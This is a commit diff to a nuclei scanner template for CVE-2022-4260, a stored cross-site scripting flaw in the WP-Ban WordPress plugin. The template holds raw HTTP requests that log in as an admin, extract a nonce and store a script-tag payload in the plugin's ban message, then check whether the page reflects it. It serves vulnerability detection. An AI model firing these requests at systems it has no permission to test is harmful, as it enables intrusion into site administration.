daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

rewrote-template-scratch

patch-1
Dhiyaneshwaran 2022-12-27 22:16:37 +05:30 committed by GitHub
parent a0e1e95043
commit f3e6069e81
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 40 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
cves/2022/CVE-2022-4260.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2022-4260 id: CVE-2022-4260
info: info:
name: WP-Ban < 1.69.1 - Admin+ Stored XSS name: WP-Ban < 1.69.1 - Admin Stored XSS
author: Hardik-Solanki author: Hardik-Solanki
severity: high severity: high
description: | description: |
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
remediation: Fixed in version 1.69.1
reference: reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
@ -15,43 +16,51 @@ info:
cwe-id: CWE-79 cwe-id: CWE-79
metadata: metadata:
verified: "true" verified: "true"
tags: cve,cve2022,xss,wordpress,wp-plugin,wp-ban tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban
requests: requests:
- raw: - raw:
- | - |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 POST /wp-login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: {{Hostname}}/wp-admin/options-general.php?page=wp-ban%2Fban-options.php
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}} Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check Cookie: wordpress_test_cookie=WP%20Cookie%20check
_wpnonce=d65eec14d6&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E&Submit=Save+Changes log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
POST / HTTP/1.1 GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
Host: {{Hostname}}
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
- |
GET / HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XSS Referer: XSS
matchers-condition: and host-redirects: true
max-redirects: 2
cookie-reuse: true
req-condition: true
matchers: matchers:
- type: word - type: dsl
dsl:
- 'contains(body_4, "<script>alert(document.domain);</script>")'
- 'contains(content_type_4, "text/html")'
- 'status_code_4 == 200'
condition: and
extractors:
- type: regex
name: nonce
part: body part: body
words: group: 1
- "<script>alert(111);</script>" regex:
- '_wpnonce=([0-9a-z]+)'
- type: word internal: true
part: header
words:
- text/html
- type: status
status:
- 200